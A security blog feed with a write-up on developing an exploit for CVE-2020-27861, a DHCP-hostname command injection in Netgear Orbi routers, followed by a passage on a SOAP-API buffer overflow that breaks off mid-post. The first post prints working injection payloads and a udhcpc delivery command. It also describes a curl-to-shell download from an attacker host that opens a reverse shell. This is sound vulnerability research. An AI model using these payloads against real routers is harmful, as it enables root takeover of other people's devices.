were no known exploits. Having spent the last year and a half looking at this system, I decided to try to find the bug myself and see if I could write a functional exploit. It was tougher than I expected, but I made it work in the end :)</p>

<h2 id="introduction">introduction</h2>

<p>As I’ve mentioned in previous posts, I’ve been hunting for bugs on the Netgear Orbi for about a year and half. A few weeks ago, I came across an advisory for an unauthenticated command injection vulnerability that was reported to Netgear back in December 2020 and realized that the vulnerable firmware version was the same one that was installed on my device back when I first started looking for bugs on it. In fact, the issue had only been fixed about a month before then. If only I’d started looking just a little bit sooner! Since it was way too late for that, I thought it’d be fun to see if I could find where the vulnerability was located and write a functional exploit to gain full control of the device.</p>

<h2 id="initial-analysis">initial analysis</h2>

<p>There were no known exploits for this vulnerability at the time I started looking and the only useful information came from the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-27861">CVE entry</a> on Mitre:</p>

<blockquote>
  <p>This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR Orbi 2.5.1.16 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the UA_Parser utility. A crafted Host Name option in a DHCP request can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-11076.</p>

</blockquote>

<p>Even though it’s not much, this provided enough information to narrow things down to a specific binary and a specific input path. It would mostly come down to finding the bug and working up from there to trace the input back to the source.</p>

<h3 id="finding-the-vulnerability">finding the vulnerability</h3>

<p>With the info taken from the advisory, I moved on to analyzing the vulnerable version of <code class="language-plaintext highlighter-rouge">UA_Parser</code> to try to find where the vulnerability occurred. Since I knew this was command injection, the most likely suspect was insecure use of <code class="language-plaintext highlighter-rouge">system()</code> to execute commands. I loaded the binary up in Ghidra and used the symbol table to select <code class="language-plaintext highlighter-rouge">system()</code> and then used the Function Call Tree to check the functions that had incoming references to it. While doing this, I came across the following code snippet in one of these functions (annotated for clarity):</p>

<p><img src="/assets/images/orbi-nday/vulnerable.png" alt="vulnerable" /></p>

<p>This code stood out as a good candidate for command injection given that the argument passed to <code class="language-plaintext highlighter-rouge">system()</code> is a string constructed with what looked like user-controlled data. Additionally, the values are placed inside double quotes, which would allow for expansion.</p>

<p>I then took a look at the function I labeled <code class="language-plaintext highlighter-rouge">get_host_from_file()</code> at line 78 in the image above and learned that this function eventually reads from a file at <code class="language-plaintext highlighter-rouge">/tmp/netscan/attach_device</code> , which contains entries for each client connected to the router, including MAC, IP, and hostname. It parses out the hostname it finds and fills the static buffer <code class="language-plaintext highlighter-rouge">hostname</code> which is passed as an argument to <code class="language-plaintext highlighter-rouge">get_host_from_file()</code>. This value is eventually passed as the 4th format string arg to <code class="language-plaintext highlighter-rouge">snprintf()</code> on line 84, which constructs the string that is passed to <code class="language-plaintext highlighter-rouge">system()</code>.</p>

<p>At this point I felt pretty confident this was where the vulnerability occurred, but to get additional confirmation I took a look at the version of <code class="language-plaintext highlighter-rouge">UA_Parser</code> included with a firmware that was released after this bug was fixed (v2.7.3.22) to compare. The only thing that changed between the two snippets is the double-quotes that surround the user-controlled values were replaced with single-quotes (also known as ‘strong-quotes’), where no expansion/meta-character interpretation occurs:</p>

<p><img src="/assets/images/orbi-nday/patched.png" alt="patched" /></p>

<h3 id="tracing-the-data-from-sink--source">tracing the data from sink → source</h3>

<p>The next thing I needed to figure out was how the hostname value eventually reached this code. As mentioned above, <code class="language-plaintext highlighter-rouge">UA_Parser</code> reads the hostname value from the file <code class="language-plaintext highlighter-rouge">/tmp/netscan/attach_device</code>. I didn’t find any other references to this file in <code class="language-plaintext highlighter-rouge">UA_Parser</code> that indicated it writing to the file, so I used grep to recursively search the root filesystem I had extracted from the firmware image to find other files that referenced it. This is when I came across the binary <code class="language-plaintext highlighter-rouge">/usr/sbin/net-scan</code> which seemed like a good lead given the name.</p>

<p>After spending some time going through the code in Ghidra, I eventually found the function used to write <code class="language-plaintext highlighter-rouge">/tmp/netscan/attach_device</code> which I labeled <code class="language-plaintext highlighter-rouge">update_attach_devices()</code>. There was only a single reference to this function, which occured within another function that appeared to be the main entrypoint to trigger a ‘device scan’; this function is also only referenced once (from <code class="language-plaintext highlighter-rouge">main()</code>):</p>

<p><img src="/assets/images/orbi-nday/init-scan.png" alt="init-scan-devices" /></p>

<p>Naturally, my next question was about where/how <code class="language-plaintext highlighter-rouge">net-scan</code> was getting the values <em>it</em> used to populate the attached devices file. I spent some more time looking through the decompiled code and eventually came across a function that opened a file at <code class="language-plaintext highlighter-rouge">/tmp/dhcpd_hostlist</code> for reading. This caught my attention because the advisory for the vulnerability mentioned that a “<em>crafted Host Name option in a DHCP request can trigger execution of a system call”</em>, so it made sense that <code class="language-plaintext highlighter-rouge">net-scan</code> would get it’s values from whatever the DHCP server had received.</p>

<p>Another recursive grep later, I had confirmed that the DHCP server binary (<code class="language-plaintext highlighter-rouge">/sbin/udhcpd</code> and <code class="language-plaintext highlighter-rouge">/sbin/udhcpd-ext</code>) contained references to <code class="language-plaintext highlighter-rouge">/tmp/dhcpd_hostlist</code>. Since the source code for udhcp is included in the GPL sources for the device provided by the vendor, I took a look there and found the string in <code class="language-plaintext highlighter-rouge">leases.h</code> as a constant called <code class="language-plaintext highlighter-rouge">HOSTNAME_SHOWFILE</code>. This value is used in some custom code in a function called <code class="language-plaintext highlighter-rouge">show_clients_hostname()</code> in <code class="language-plaintext highlighter-rouge">dhcpd.c</code> (shown below at line 111) which writes the MAC/IP and hostname for each lease in the global <code class="language-plaintext highlighter-rouge">leases</code> structure to this file.</p>

<p><img src="/assets/images/orbi-nday/dhcp-a.png" alt="dhcpd-code-1" /></p>

<p><br />
Below is a snippet of code from <code class="language-plaintext highlighter-rouge">sendACK()</code> in <code class="language-plaintext highlighter-rouge">serverpacket.c:</code>, one of two locations where <code class="language-plaintext highlighter-rouge">show_clients_hostname()</code> is called. One detail that became really important later is the call to <code class="language-plaintext highlighter-rouge">toupper()</code> on line 535 — it’s called for each character in the hostname string before it is saved to the lease object where it’s saved. This causes all alphabetic letters to be uppercased in the value that’s written out to <code class="language-plaintext highlighter-rouge">/tmp/dhcpd_hostlist</code> and eventually ends up in the vulnerable call to <code class="language-plaintext highlighter-rouge">system()</code>.</p>

<p><img src="/assets/images/orbi-nday/dhcp-b.png" alt="dhcpd-code-2" /></p>

<h3 id="summary-of-the-analysis">summary of the analysis</h3>

<ul>
  <li>the vulnerability occurs in <code class="language-plaintext highlighter-rouge">UA_Parser</code> due to a call to <code class="language-plaintext highlighter-rouge">system()</code> using a string containing a attacker-controlled hostname value</li>
  <li><code class="language-plaintext highlighter-rouge">UA_Parser</code> reads the hostname value from <code class="language-plaintext highlighter-rouge">/etc/netscan/attach_device</code></li>
  <li><code class="language-plaintext highlighter-rouge">UA_Parser</code> is executed by a binary called <code class="language-plaintext highlighter-rouge">net-scan</code> used to detect attached devices</li>
  <li><code class="language-plaintext highlighter-rouge">net-scan</code> creates the file <code class="language-plaintext highlighter-rouge">/etc/netscan/attach_device</code></li>
  <li><code class="language-plaintext highlighter-rouge">net-scan</code> reads the hostname values from the file <code class="language-plaintext highlighter-rouge">/tmp/dhcpd_hostlist</code></li>
  <li><code class="language-plaintext highlighter-rouge">/tmp/dhcpd_hostlist</code> is created by <code class="language-plaintext highlighter-rouge">udhcpd</code> using the hostnames saved in it’s global leases array</li>
  <li><code class="language-plaintext highlighter-rouge">udhcpd</code> populates the hostname field for each lease struct in the global array using values received in DHCP REQUEST packets</li>
</ul>

<h2 id="testing-setup">testing setup</h2>

<h3 id="debugging">debugging</h3>

<p>I created the following GDB script to set breakpoints on <code class="language-plaintext highlighter-rouge">main()</code> and <code class="language-plaintext highlighter-rouge">system()</code> when I attached to <code class="language-plaintext highlighter-rouge">UA_Parser</code> , as well as set the fork-mode settings to be sure the debugger follows the processes as they spawn.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">set </span>breakpoint pending on
<span class="nb">set </span>follow-fork-mode child
<span class="nb">break </span>main
commands 1
<span class="nb">set </span>follow-fork-mode parent
<span class="k">continue
</span>end

<span class="nb">break </span>system
commands 2
info args
backtrace full
info frame
info registers
x/s <span class="nv">$r0</span>
x/s <span class="nv">$r1</span>
x/s <span class="nv">$r2</span>
<span class="k">continue
</span>end
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">net-scan</code> runs periodically in the background on the device but a re-scan can also be manually triggered by loading the “Attached Devices” page in the web admin UI. This is what I used during testing to force it to run the vulnerable code. Interestingly, I later discovered it would run even with unauthenticated requests to the homepage, so an attacker would actually be able to trigger the vulnerable code on-demand.</p>

<p>Below is a screenshot of the GDB script breaking on <code class="language-plaintext highlighter-rouge">system()</code> while attached to the <code class="language-plaintext highlighter-rouge">UA_Parser</code> process and triggering the vulnerable code. The argument that was passed to <code class="language-plaintext highlighter-rouge">system()</code> can be seen near the bottom of the register listing (the call to ‘devices_info update …’).</p>

<p><img src="/assets/images/orbi-nday/gdb-uaparser.png" alt="gdb-uaparser" /></p>

<h3 id="payload-delivery">payload delivery</h3>

<p>In order to send custom DHCP hostname values easily and establish DHCP connections, I used <code class="language-plaintext highlighter-rouge">udcpc</code>, which allows for passing in a custom hostname at the command line. I used this command after connecting to the Orbi using a static IP and confirmed the payload appeared in the relevant files.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> ./udhcpc <span class="nt">-H</span> <span class="s2">"</span><span class="se">\$</span><span class="s2">PATH"</span> <span class="nt">-f</span> <span class="nt">-i</span> &lt;interface&gt; <span class="nt">-n</span>
</code></pre></div></div>

<p>With everything set up to be able to deliver payloads, it was time to start building one.</p>

<h2 id="crafting-payloads">crafting payloads</h2>

<h3 id="using-parametersubstring-expansion-to-build-a-payload">using parameter+substring expansion to build a payload</h3>

<p>As mentioned earlier in this post, each character in the hostname value that <code class="language-plaintext highlighter-rouge">udhcpd</code> receives from clients is uppercased before it’s saved to the global <code class="language-plaintext highlighter-rouge">leases</code> array and eventually written to <code class="language-plaintext highlighter-rouge">/tmp/dhcpd_hostlist</code>. This means that by the time <code class="language-plaintext highlighter-rouge">UA_Parser</code> reads these value from <code class="language-plaintext highlighter-rouge">/tmp/netscan/attach_device</code>, a payload like <code class="language-plaintext highlighter-rouge">$(reboot)</code> would be transformed to <code class="language-plaintext highlighter-rouge">$(REBOOT)</code>. Linux and native Linux file systems are case-sensitive, which means any such payload would fail to execute the desired program. So, I needed to find a way to call binaries using only uppercase letters, alphanumeric symbols, and numbers.</p>

<p>My first thought was I would likely need to use shell expansion and environment variables since they typically use uppercase names. I did a bit of Googling and  came across <a href="https://wiki.bash-hackers.org/syntax/pe">this page</a> about bash parameter expansion, which seemed like a viable way to construct a working payload. Specifically, I thought <a href="https://wiki.bash-hackers.org/syntax/pe#substring_expansion">substring expansion</a> could be used slice up pieces of environment variables to grab the characters needed to build a payload. With this in mind, I checked what environment variables were available in the shell for root (the UA_Parser process runs as root) and quickly realized I would have to get pretty creative given what was was there.</p>

<p><img src="/assets/images/orbi-nday/env-listing.png" alt="env" /></p>

<p>I played around with different patterns in the shell while connected via serial and eventually found one that made use of both parameter and filepath expansion which would expand out to <code class="language-plaintext highlighter-rouge">/sbin/reboot</code> built up from characters sliced from the <code class="language-plaintext highlighter-rouge">$PATH</code> env variable</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">${</span><span class="nv">PATH</span>:4:5<span class="k">}</span>/<span class="k">${</span><span class="nv">PATH</span>:3:1<span class="k">}</span>?????
</code></pre></div></div>

<p>In this context, the <code class="language-plaintext highlighter-rouge">?</code> symbol is used to match up to a single character — the expansion works because <code class="language-plaintext highlighter-rouge">reboot</code> is the only binary in <code class="language-plaintext highlighter-rouge">/sbin</code> that starts with <code class="language-plaintext highlighter-rouge">r</code> followed by 5 characters. The screenshot below shows the final payload constructed piece by piece.</p>

<p><img src="/assets/images/orbi-nday/payload-v1.png" alt="payload-v1" /></p>

<p>The final step was to place this payload within a shell context using command substitution so that once the string expanded out it would be interpreted as a command. To do this I wrapped the payload inside <code class="language-plaintext highlighter-rouge">$()</code> syntax and set everything up to do a test run. After getting a DHCP lease with the crafted request and attaching to the running <code class="language-plaintext highlighter-rouge">UA_Parser</code> process, I loaded the Attached Devices page in the web UI and caused <code class="language-plaintext highlighter-rouge">net-scan</code> to run. Easy peasy, right?</p>

<p>Yeah, right. It’s never that easy.</p>

<h3 id="more-constraints-html-encoding">more constraints: html encoding</h3>

<p>The screenshow below shows the debugger output when catching the vulnerable call to <code class="language-plaintext highlighter-rouge">system()</code> with the payload above.</p>

<p><img src="/assets/images/orbi-nday/html-encode.png" alt="html-encoding" /></p>

<p>This is when I discovered there was <em>some</em> filtering happening and certain characters are HTML encoded. Specifically, the parentheses characters are encoded in the payload above. I went back through code for <code class="language-plaintext highlighter-rouge">net-scan</code> and found the function responsible for the encoding — the full list of encoded characters are:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">&lt; &gt; ( ) &amp; ' " \</code></li>
</ul>

<p>I also learned that <code class="language-plaintext highlighter-rouge">net-scan</code> truncates the hostname string read from the DHCP host list at 32 characters before writing it to <code class="language-plaintext highlighter-rouge">/tmp/netscan/attach_device</code>.</p>

<p>Pretty rough! Almost every useful character (in regards to shell manipulation) is encoded and there’s a pretty tight length limit, which only makes writing a functional exploit that much more difficult. But, first I had to get code execution, so I pushed on.</p>

<h3 id="success-backquote-command-substitution">success: backquote command substitution</h3>

<p>There was really only one other option left to get to get command execution considering parenthese were filtered and that was the use the older backquote form of substitution:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="sb">`</span><span class="k">${</span><span class="nv">PATH</span>:4:5<span class="k">}</span>/<span class="k">${</span><span class="nv">PATH</span>:3:1<span class="k">}</span>?????<span class="sb">`</span>
</code></pre></div></div>

<p>I did the usual dance to connect and send a DHCP request while attached to the UA_Parser process with GDB. After triggering <code class="language-plaintext highlighter-rouge">net-scan</code> again, I caught the call to <code class="language-plaintext highlighter-rouge">system()</code> and saw that a new chain of calls had occurred and <code class="language-plaintext highlighter-rouge">reboot</code> had been called. The device then began to reboot!</p>

<p><img src="/assets/images/orbi-nday/success-1.png" alt="success-1" /></p>

<p>And there it is, a working proof-of-concept showing the bug could be exploited…</p>

<h2 id="escaping-constraints-arbitrary-code-execution">escaping constraints: arbitrary code execution</h2>

<p>Okay, but rebooting the device isn’t particularly cool. Now it was time to think about what could actually be done with the bug.</p>

<p>To recap, the contraints for the payload are:</p>

<ul>
  <li>32 character length limit</li>
  <li>All letters get uppercased</li>
  <li>Filters chars: <code class="language-plaintext highlighter-rouge">&lt; &gt; ( ) &amp; ' " \</code></li>
  <li>must build payload from chars in env variables + file/parameter expansion:
    <ul>
      <li><code class="language-plaintext highlighter-rouge">PATH=/usr/sbin:/usr/bin:/sbin:/bin</code></li>
      <li><code class="language-plaintext highlighter-rouge">HOME=/tmp</code></li>
      <li><code class="language-plaintext highlighter-rouge">HOSTNAME=RBR20</code></li>
    </ul>
  </li>
</ul>

<p>The length limit was probably the most frustrating part of this whole thing when combined with the uppercasing issue — it could easily take 7-9 characters to do the expansion needed to grab a single character for the final payload, so using up those 32 characters was <strong>very</strong> easy. The inability to use <code class="language-plaintext highlighter-rouge">&gt;</code> or <code class="language-plaintext highlighter-rouge">&lt;</code> also meant using redirection to overwrite files wasn’t an option.</p>

<p>With all of this in mind, I narrowed down the possible attack scenarios to the following:</p>

<ul>
  <li>Leak admin credentials back to the attacker somehow</li>
  <li>Reset the admin password</li>
  <li>Download and execute a script to run arbitrary commands without dealing with constraints</li>
</ul>

<p>I spent a couple of days experimenting with what felt like hundreds of payloads and possible angles to achieve one of the results above. Again, that length limit SUCKED — on multiple occasions I had figured out working payloads that ended up exceeding the limit by 1-2 characters and immediately became useless. At the end of each session I would tell myself I would give up and that it just wasn’t possible to do anything useful given the restrictions. Then the next day when I signed back on I would get sucked back in, convinced there just had to be a way.</p>

<h3 id="going-after-curl">going after curl</h3>
<p>After tons of failed attempts, I eventually came to a conclusion: in order to do <em>anything</em> useful, I would need to find a way to break out of / get around the length limit. Having determined this, I knew the only feasible way forward would be to find a way to download a script from a remote source and run it, which would avoid the uppercasing issues, length limits, etc. With this in mind, I shifted my focus to figuring out a way to use the <code class="language-plaintext highlighter-rouge">curl</code> or <code class="language-plaintext highlighter-rouge">wget</code> binaries on the router to achieve this.</p>

<p>This finally paid off after another couple of hacking sessions when I figured out the following payload:</p>

<p><img src="/assets/images/orbi-nday/curl-1.jpeg" alt="curl-payload" /></p>

<p>The first part makes use of expansion to match <code class="language-plaintext highlighter-rouge">/usr/bin/curl</code>, which is used to make a request to a server (<code class="language-plaintext highlighter-rouge">hy.me</code> in this example), and pipes the contents of the response to a shell (pointed to by <code class="language-plaintext highlighter-rouge">$0</code>).</p>

<p>In order to test this and show it working without having to actually go out and buy a two character domain (which apparently go for anywhere between $500 - $15k), I edited <code class="language-plaintext highlighter-rouge">/etc/hosts</code> on the device to add a record pointing <code class="language-plaintext highlighter-rouge">hy.me</code> to my ‘evil’ server where I was running a Python web server that would respond with the contents of a shell script to requests for the root path (to use as few characters as possible).</p>

<p>The screenshot below shows everything in action, going <strong>counter-clockwise</strong> starting at the top-left:</p>

<ul>
  <li>the udhcpc process that sent the payload</li>
  <li>the code for the Python webapp that returns code to spawn a reverse shell</li>
  <li>the running webapp showing requests were received from the Orbi</li>
  <li>(open telnet session, unrelated)</li>
  <li>the netcat listener receiving the connection from reverse shell</li>
</ul>

<p><img src="/assets/images/orbi-nday/reverse-shell.png" alt="reverse-shell" /></p>

<h2 id="conclusion">conclusion</h2>

<p>There it is: there’s now an exploit for CVE-2020-27861 and it can be used to completely take over a vulnerable Orbi device.  In total, it took about a week to go from starting to initial analysis to finally getting arbitrary code execution, with most of the time being spent on figuring out how to create a payload to actually do something useful given the restrictions. It was pretty fun and I was able to pick up some new techniques for dealing with payload constraints for command execution.</p>

<p>The most important lesson learned? <strong>Persistence pays off</strong> (usually). I really didn’t think a full exploit would be possible and almost gave up before getting full system control, but I’m glad I kept pushing. I’ll probably start spending more time doing this kind of n-day research and monitoring advisories for specific devices/applications to hopefully be able to do this for a more recent vuln.</p>

<h2 id="resources">Resources</h2>

<ul>
  <li><a href="https://kb.netgear.com/000062507/Security-Advisory-for-Unauthenticated-Command-Injection-Vulnerability-on-Some-Extenders-and-Orbi-WiFi-Systems-PSV-2020-0301">Netgear Advisory</a></li>
  <li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-27861">Mitre CVE listing: CVE-2020-27861</a></li>
  <li><a href="https://wiki.bash-hackers.org/syntax/pe">Parameter expansion [Bash Hackers]</a></li>
  <li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md">PayloadAllTheThings Reverse Shell Cheatsheet</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="research" /><category term="ndays" /><category term="exploit-dev" /><category term="orbi" /><category term="netgear" /><category term="iot" /><summary type="html"><![CDATA[rediscovering and developing a weaponized exploit for a command injection vulnerability in Orbi wifi systems that was reported and patched last year.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/orbi-connect.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/orbi-connect.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">orbi hunting 0x1: crashes in soap-api</title><link href="https://blog.coffinsec.com/research/2022/06/19/orbi-hunting-1-soap-api-crashes.html" rel="alternate" type="text/html" title="orbi hunting 0x1: crashes in soap-api" /><published>2022-06-19T00:00:00+00:00</published><updated>2022-06-19T00:00:00+00:00</updated><id>https://blog.coffinsec.com/research/2022/06/19/orbi-hunting-1-soap-api-crashes</id><content type="html" xml:base="https://blog.coffinsec.com/research/2022/06/19/orbi-hunting-1-soap-api-crashes.html"><![CDATA[<p>The second part in this series going over my time hunting for bugs on the netgear orbi. This post is a walkthrough of a <em>long</em> journey that began with the discovery of a buffer overflow which I initially though was unreachable due to a <em>separate</em> null pointer dereference and eventually finding a way to get past that null deref — only to ultimately be thwarted by a stack canary that couldn’t be easily bypassed (at least, not by me). So, free 0day for anyone that <em>can</em> exploit it? Hit me up on twitter to let me know how you did it.</p>

<h2 id="introduction">introduction</h2>
<p>The Orbi provides a SOAP server which seems to primarily be used by the Netgear mobile application, reachable at <code class="language-plaintext highlighter-rouge">http://&lt;ROUTER&gt;/soap/server_sa</code>.  I had originally discovered this endpoint early on when I started looking at this router but it wasn’t until I had connected over serial that I realized it was incredibly easy to crash the binary that handles SOAP requests, <code class="language-plaintext highlighter-rouge">/usr/sbin/soap-api</code>. In fact, almost every requests I sent to this endpoing caused a stack trace to be printed to the console. This seemed like a good enough place to start so I decided to figure out exactly what caused these crashes and whether any of it was exploitable.</p>

<p>Note: I chose to write about this issue and not report it to Netgear since merely crashing the <code class="language-plaintext highlighter-rouge">soap-api</code> process does very little and doesn’t even really work as a denial-of-service mechanism because a new process is spawned on each request. As far as I can tell there’s no security impact here.</p>

<h3 id="background">background</h3>

<p>The SOAP server parses the HTTP header <code class="language-plaintext highlighter-rouge">SOAPAction</code> on incoming requests to determine which SOAP action/method the user wants to trigger. The request is initially handled by lighttpd, where <code class="language-plaintext highlighter-rouge">mod_cgi</code> handles initial processing and passes it onto <code class="language-plaintext highlighter-rouge">soap-api</code>. The server sets environment variables that describe the request, which  <code class="language-plaintext highlighter-rouge">soap-api</code> then reads from in order to handle it.</p>

<p>The format of the <code class="language-plaintext highlighter-rouge">SOAPAction</code> header is:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">&lt;urn:VENDOR:service:ACTION_str:1#METHOD_str</code> .</li>
</ul>

<h3 id="crash-discovery">crash discovery</h3>

<p>While doing some manual testing after starting with a known-good <code class="language-plaintext highlighter-rouge">SOAPAction</code> header value, I found that server would send the following response when submitting a <code class="language-plaintext highlighter-rouge">METHOD_str</code> part that is 248 characters or longer while simultaneously causing a crash dump to be printed to the console .</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HTTP/1.1 200 OK
Content-Length: 763
Content-Type: text/xml; charset="UTF-8"
Server: Linux/2.6.15 uhttpd/1.0.0 soap/1.0
Connection: close
Date: Fri, 25 Jun 2021 14:09:01 GMT

&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;SOAP-ENV:Envelope
   xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
   SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt;
&lt;SOAP-ENV:Body&gt;
&lt;m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse xmlns:m="urn:NETGEAR-ROUTER:service:x:1"&gt;&lt;/m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;/SOAP-ENV:Body&gt;
&lt;/SOAP-ENV:Envelope&gt;
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SOAP Len:0 Action:x Method:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgd = d7854000
[00000000] *pgd=00000000

CPU: 3 PID: 26769 Comm: soap-api Tainted: P             3.14.77 #1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtask: dce74380 ti: d6014000 task.ti: d6014000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPC is at 0xb6b52db4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALR is at 0xb6b4ee88
AAAAAAAAAAAAAAAAAAA IP:10.13.13.211

pc : [&lt;b6b52db4&gt;]    lr : [&lt;b6b4ee88&gt;]    psr: 60000010
sp : befff398  ip : 7f5fce58  fp : 7f6026fc
r10: befff424  r9 : befff44c  r8 : befff48c
r7 : befff54c  r6 : befff400  r5 : 7f5d4594  r4 : 00000000
r3 : 00000000  r2 : 00000001  r1 : 00000000  r0 : 00000000
Flags: nZCv  IRQs on  FIQs on  Mode USER_32  ISA ARM  Segment user
Control: 10c5387d  Table: 9785406a  DAC: 00000015
CPU: 3 PID: 26769 Comm: soap-api Tainted: P             3.14.77 #1
[&lt;c021ea68&gt;] (unwind_backtrace) from [&lt;c021bb60&gt;] (show_stack+0x10/0x14)
[&lt;c021bb60&gt;] (show_stack) from [&lt;c03b5518&gt;] (dump_stack+0x78/0x98)
[&lt;c03b5518&gt;] (dump_stack) from [&lt;c02234b0&gt;] (__do_user_fault+0x74/0xbc)
[&lt;c02234b0&gt;] (__do_user_fault) from [&lt;c022385c&gt;] (do_page_fault+0x2f0/0x370)
[&lt;c022385c&gt;] (do_page_fault) from [&lt;c02083dc&gt;] (do_DataAbort+0x34/0x98)
[&lt;c02083dc&gt;] (do_DataAbort) from [&lt;c02096f4&gt;] (__dabt_usr+0x34/0x40)
Exception stack(0xd6015fb0 to 0xd6015ff8)
5fa0:                                     00000000 00000000 00000001 00000000
5fc0: 00000000 7f5d4594 befff400 befff54c befff48c befff44c befff424 7f6026fc
5fe0: 7f5fce58 befff398 b6b4ee88 b6b52db4 60000010 ffffffff
</code></pre></div></div>

<p>Unfortunately, it was nearly impossible to identify where the crash was actually happening from the crash dump alone as the stack trace only shows the top of the call stack containing chain of calls in the kernel that handled the fault. Since the stack trace was no help, I figured the next step was to load <code class="language-plaintext highlighter-rouge">soap-api</code> up in Ghidra and find where the SOAPACtion header was being  parsed and trace it through the application, looking for places where it could overflow a buffer.</p>

<h2 id="first-find-buffer-overflow-in-sendsoapresponse">first find: buffer overflow in SendSoapResponse()</h2>

<p>After digging through functions in the binary for a while and looking for strings that looked familiar/related to the output i was getting from the server, I found the following piece of code at function  <code class="language-plaintext highlighter-rouge">0x0003e82c.</code>   From looking at the non-stripped versions of this binary, I was able to identify this function as <code class="language-plaintext highlighter-rouge">SendSoapResponse</code>. This function is responsible for constructing the HTTP response, including the response headers, sent to the client.</p>

<p><img src="/assets/images/orbi-ghidra1.png" alt="ghidra" /></p>

<p>The overflow occurs on line 48 in the decompiled code shown above as a result of the call to  <code class="language-plaintext highlighter-rouge">sscanf()</code>. This line parses the SOAP method section from the server response content  (<code class="language-plaintext highlighter-rouge">&lt;m:AAAAA[...]Response</code>) and writes it to the buffer <code class="language-plaintext highlighter-rouge">auStack236</code> , which is a 64-byte static buffer, without any length checks. At this point I felt pretty confident this was the crash I was seeing in the stack traces, so next I wanted to understand what paths led to this code being executed.</p>

<p>After reading through the code some more I realized almost every request eventually led to  <code class="language-plaintext highlighter-rouge">SendSoapResponse()</code> (I mean, duh, right?). In general, the flow always goes a little something like this:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">main()</code>
    <ul>
      <li>takes care of getting the SOAPAction header from an environment variable <code class="language-plaintext highlighter-rouge">SOAP_ACTION</code> or <code class="language-plaintext highlighter-rouge">HTTP_SOAPACTION</code> (set by the parent HTTP server (lighttpd) or the CGI handler (modcgi, procgi))</li>
      <li>handles parsing of the SOAP action and SOAP method parts from the header</li>
      <li>saves pointers to the start of each section in the buffer/PTR returned by <code class="language-plaintext highlighter-rouge">getenv()</code></li>
      <li>these ptrs are passed to <code class="language-plaintext highlighter-rouge">SoapExecute()</code></li>
    </ul>
  </li>
  <li><code class="language-plaintext highlighter-rouge">SoapExecute()</code>
    <ul>
      <li>The main function that actually does handling of the various SOAP actions and methods</li>
      <li>Handles authentication checks</li>
      <li>Calls appropriate functions/etc based on submitted actions / method</li>
      <li>at the end of pretty much every case, it calls <code class="language-plaintext highlighter-rouge">SendSoapRespCode()</code>, passing the <code class="language-plaintext highlighter-rouge">soap_action</code> and <code class="language-plaintext highlighter-rouge">soap_method</code> pointers as arguments</li>
    </ul>
  </li>
  <li><code class="language-plaintext highlighter-rouge">SendSoapRespCode()</code>
    <ul>
      <li>Constructs a portion of the HTTP response one of two ways depending on whether the SOAP method was <code class="language-plaintext highlighter-rouge">Authenticate</code> or not</li>
      <li>The HTML/XML blob is then passed on to <code class="language-plaintext highlighter-rouge">SendSoapResponse()</code> along with the SOAPAction header value</li>
    </ul>
  </li>
  <li><code class="language-plaintext highlighter-rouge">SendSoapResponse()</code>
    <ul>
      <li>Here the final response content is finalized and sent to the client</li>
    </ul>
  </li>
</ul>

<h3 id="live-debugging">live debugging</h3>

